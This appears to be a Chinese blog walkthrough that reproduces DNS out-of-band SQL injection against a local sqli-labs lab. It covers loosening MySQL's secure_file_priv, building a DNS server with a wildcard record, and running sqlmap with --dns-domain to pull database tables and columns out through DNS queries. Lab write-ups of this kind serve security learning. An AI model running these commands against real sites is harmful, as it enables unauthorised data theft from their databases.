当前位置:网站首页>复现dns外带数据结合sqlmap
复现dns外带数据结合sqlmap
2022-08-10 05:48:00 【鱼传尺素zz】
设置mysql的secure_file_priv属性
secure_file_priv为空,就可以读取磁盘的目录
secure_file_priv为D:\,就可以读取D盘的文件
secure_file_priv为null,load_file就不能加载文件
添加一句secure_file_priv=“”
配置dns服务器
1.添加角色
2.添加正向查找
3.新建主机
IP地址为sqlmap所在虚机的ip地址
在创建一个泛解析
使用虚拟机ping刚刚在服务端设置的域名,并且在kali中输入tcpdump -n port 53;查看信息返回。
4.创建条件转发器
SQLMap使用外带dns注入
取库
sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D security --tables
获取表
sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D "security" --tables
获取列
sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D "security" -t "users" --columns
边栏推荐
猜你喜欢
随机推荐
UnityShader入门精要--Unity中的基础光照
一种奇怪的函数声明写法
强化学习_06_DataWhale深度Q网络
H2数据库如何动态插入数据
Simplest character device driver
2022河南萌新联赛第(五)场:信息工程大学 F - 分割草坪
Talking about 3 Common Shadow Rendering Techniques in Games (3): Shadow Mapping
Two-dimensional cartoon rendering - coloring
二叉树 6/15 76-80
如何实现网格建造系统
第11章 数据库的设计规范【2.索引及调优篇】【MySQL高级】
Qt中输入框在Win10上“Win+/“快捷键的一个Bug
如何在VMlogin中设置YiLu代理?
Qt绘制椭圆曲线的角度问题(离心角和旋转角)
虚幻5简单第三人称游戏制作文档
Parallax Mapping: More Realistic Texture Detail Representation (Part 1): Why Use Parallax Mapping
Share a professional TA's "Shader Reference"
第12章 数据库其它调优策略【2.索引及调优篇】【MySQL高级】
COLMAP+OpenMVS实现物体三维重建mesh模型
2022河南萌新联赛第(五)场:信息工程大学 H - 小明喝奶茶